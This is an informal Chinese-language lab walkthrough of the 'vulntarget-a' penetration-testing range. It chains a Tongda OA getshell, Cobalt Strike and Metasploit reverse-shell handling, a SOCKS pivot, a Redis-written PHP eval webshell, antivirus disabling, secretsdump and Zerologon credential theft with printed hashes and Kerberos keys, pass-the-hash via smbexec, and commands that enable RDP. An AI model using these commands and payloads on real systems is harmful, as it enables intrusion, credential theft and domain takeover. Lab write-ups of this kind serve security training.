vulntarget-a

CDxiaodong

vulntarget-a攻击机：
kali：192.168.0.124
win：19.128.0.193

靶机
第一层：VMnet18 win2016 win7（192.168.0.188）
第二层 ：VNnet19 win2016 win2019

​

配置一下ip，这里外网机ip192.168.127.91实际为192.168.0.188
打开
通达oa 一键getshell
​

传个cs载荷上去
​

这里因为第二层设计的是redis，cs转为msf上线
msf
use exploit/multi/handlerset payload windows/meterpreter/reverse_http（跟cs上选用的payload一样）set lhost 192.168.0.124//本机ipset lport 7777/接受的端口exploit //执行​

然后cs那边创建一个foreign监听的listeners。
Listeners的ip为msf的ip，端口为msf监听的端口（注：如果msf是内网下的，则需要把端口映射到公网，或者使用ngrok等工具做流量转发）
然后，回到cs上，选中拿下的计算机会话，右键选中spawn，然后在弹出来的框中
​

ok
添加路由，并设置msf代理转发，arp获取到内网同网段IP
在添加路由之后，需要设置代理，对内网的机器进行扫描和漏洞探测。
use auxiliary/server/socks在这里一共有两个大模块，一个是auxiliary/server/socks_proxy，包含socks4a和socks5，auxiliary/server/socks_unc，包含socks_unc，据说有时候socks5的代理不是很稳定。

meterpreter > bg

Backgrounding session 1...msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) >  use post/multi/manage/autoroute//添加路由msf6 post(multi/manage/autoroute) > set session 1session => 1msf6 post(multi/manage/autoroute) > run​[!] SESSION may not be compatible with this module.

Running module against WIN7-PC

Searching for subnets to autoroute.[+] Route added to subnet 10.0.0.0/255.255.0.0 from host's routing table.[+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.

Post module execution completedmsf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy//使用socks5代理msf6 auxiliary(server/socks_proxy) > optinos[-] Unknown command: optinos.msf6 auxiliary(server/socks_proxy) > options​Module options (auxiliary/server/socks_proxy):​   Name      Current Setting  Required  Description​----      ---------------  --------  -----------​   PASSWORD                   no        Proxy password for SOCKS5 listener   SRVHOST   0.0.0.0          yes       The address to listen on   SRVPORT   1080             yes       The port to listen on   USERNAME                   no        Proxy username for SOCKS5 listener   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)​​Auxiliary action:​   Name   Description​----   -----------​   Proxy  Run a SOCKS proxy server​​msf6 auxiliary(server/socks_proxy) > run

Auxiliary module running as background job 0.msf6 auxiliary(server/socks_proxy) >

Starting the SOCKS proxy server​msf6 auxiliary(server/socks_proxy) > sessions -i 1

Starting interaction with 1...​meterpreter > arp a​ARP cache=========​    IP address       MAC address        Interface    ----------       -----------        ---------    10.0.20.99       00:0c:29:49:db:32  13    10.0.255.255     ff:ff:ff:ff:ff:ff  13    192.168.0.1      b8:3a:08:4b:16:a0  11    192.168.0.124    00:0c:29:99:4d:88  11    192.168.0.193    3c:6a:a7:aa:36:f6  11    192.168.0.255    ff:ff:ff:ff:ff:ff  11    224.0.0.22       00:00:00:00:00:00  1    224.0.0.22       01:00:5e:00:00:16  11    224.0.0.22       01:00:5e:00:00:16  13    224.0.0.252      01:00:5e:00:00:fc  11    224.0.0.252      01:00:5e:00:00:fc  13    239.255.255.250  00:00:00:00:00:00  1    255.255.255.255  ff:ff:ff:ff:ff:ff  11​meterpreter > 10.0.20.99就是win2016的redis服务
proxy全局代理一下
​

​

bg出去看下有没有任务执行
​

辣鸡msf丢包了（后面发现是虚拟机自动休眠= =）
后来发先这个0.0.0.0 1080的意思是0.0.0.0是msf的ip来进行代理 也就是本机ip
然后proxy的写法是 socks5 192.168.0.124 1080
不是socks 12.168.0.124:1080 这是很早之前的版本
再来一遍 ok
roxychains redis-cli -h 10.0.20.99 ​

redis未授权漏洞写webshell
config set dir "C:/phpStudy/PHPTutorial/WWW/"config set dbfilename tx.phpset 1 "<?php @eval($_POST['tx']);?>"save​

蚁剑代理连接
​

无语试了好几次- -= =
记得保存代理！！！！！！！！！！！！！！
卡了我好久 = =

cs转发上线新建中转监听-转发生成beacon.exe-上传-执行
好家伙 又遇到了和之前做weblogic一样的转发问题
总共感觉是因为我第一层网络配置在内网的原因
把所有的靶机关下防火墙试试
还是不行，算了，打ack123，把那个会了 估计这两个就会了
学完了ack123
再来看看
看下改下ip把各个网段ping通和改dns试试
​

好了先把上面那些操作再执行一遍????
成功上线
​

这里有个关键，是要把这个机器自带的mic杀毒关掉
不过这一般不能cmd关掉，可以Negro带内网出网开3389再用注册表或者组策略（百度一大堆）关掉
也可以直接关掉”实时监控病毒“
当然直接shellcode用cool平台免杀过

接下来把密码dump一下
​

aad3b435b51404eeaad3b435b51404ee
探测一下存活主机
​

​

​

10.0.10.110 而且还有域
shell setspn -T vulntarget.com -q /
为啥没扫出来
看着好像是这个win2019没在域内
CVE-2021-36934读取一下密码
​

转msf
探测主域和域控
此时来探测下主域
定位域控
run post/windows/gather/enum_domain得到域控IP：10.0.10.110
账号：WIN-UKFQSV1OMUB
域：balsec.com
再次添加路由：
直接使用CVE-2020-1472（域控提权）
​

还是不行，绝对是他域没配置好的原因
配置一下，提权后
使用impactet来进行下一步的操作
获取域控hash，cd到example下：
开个ew代理配合proxy

proxychains4 python3 secretsdump.py balsec.com/WIN-UKFQSV1OMUB\$@10.0.10.110 -no-passB$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::WIN-CHSI558JDRS$:1103:aad3b435b51404eeaad3b435b51404ee:e66191ef715d73ff91be074777d3ed02:::

Kerberos keys grabbedAdministrator:aes256-cts-hmac-sha1-96:ecb89a4e91cccc9c7fc032d25baacac6d86068c030f617185a52854eb796c920Administrator:aes128-cts-hmac-sha1-96:d3b5696e566bca57ffdfd57576068c63Administrator:des-cbc-md5:322a836da886d39dkrbtgt:aes256-cts-hmac-sha1-96:4d1befebb0d088a69c01f5a4045b3ce78b061d61c273cc7e5f38ca54eec9538dkrbtgt:aes128-cts-hmac-sha1-96:4117fc904715b252b8bed058315068b1krbtgt:des-cbc-md5:7a45ad015d2cba86WIN-UKFQSV1OMUB$:aes256-cts-hmac-sha1-96:f03227a5a0d4203943c8e63070692aafbf93f475afc4310dba3350bd4736d59aWIN-UKFQSV1OMUB$:aes128-cts-hmac-sha1-96:f0f2c8151d89eff91e9d76f412ca54d1WIN-UKFQSV1OMUB$:des-cbc-md5:f4f8193dc80b4ce0WIN-CHSI558JDRS$:aes256-cts-hmac-sha1-96:ef70a9041487fef2f7fa4dd91724545ed5286d70242495370b92393de45cb971WIN-CHSI558JDRS$:aes128-cts-hmac-sha1-96:2157ac92157cde35268a54568a834333WIN-CHSI558JDRS$:des-cbc-md5:ef8a9449a2b64c37

Cleaning up...
proxychains4 python3 secretsdump.py balsec.com/WIN-UKFQSV1OMUB\$@10.0.10.110 -no-passB$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::WIN-CHSI558JDRS$:1103:aad3b435b51404eeaad3b435b51404ee:e66191ef715d73ff91be074777d3ed02:::

Kerberos keys grabbedAdministrator:aes256-cts-hmac-sha1-96:ecb89a4e91cccc9c7fc032d25baacac6d86068c030f617185a52854eb796c920Administrator:aes128-cts-hmac-sha1-96:d3b5696e566bca57ffdfd57576068c63Administrator:des-cbc-md5:322a836da886d39dkrbtgt:aes256-cts-hmac-sha1-96:4d1befebb0d088a69c01f5a4045b3ce78b061d61c273cc7e5f38ca54eec9538dkrbtgt:aes128-cts-hmac-sha1-96:4117fc904715b252b8bed058315068b1krbtgt:des-cbc-md5:7a45ad015d2cba86WIN-UKFQSV1OMUB$:aes256-cts-hmac-sha1-96:f03227a5a0d4203943c8e63070692aafbf93f475afc4310dba3350bd4736d59aWIN-UKFQSV1OMUB$:aes128-cts-hmac-sha1-96:f0f2c8151d89eff91e9d76f412ca54d1WIN-UKFQSV1OMUB$:des-cbc-md5:f4f8193dc80b4ce0WIN-CHSI558JDRS$:aes256-cts-hmac-sha1-96:ef70a9041487fef2f7fa4dd91724545ed5286d70242495370b92393de45cb971WIN-CHSI558JDRS$:aes128-cts-hmac-sha1-96:2157ac92157cde35268a54568a834333WIN-CHSI558JDRS$:des-cbc-md5:ef8a9449a2b64c37

Cleaning up...
得到administrator的hash
aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15直接就拿下域控
proxychains4 python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da3开个3389远程登录
开启远程桌面
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /fwmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow直接3389登录：proxychains4 rdesktop 10.0.10.110
账号：balsec.com\administrator 密码：Admin@666




​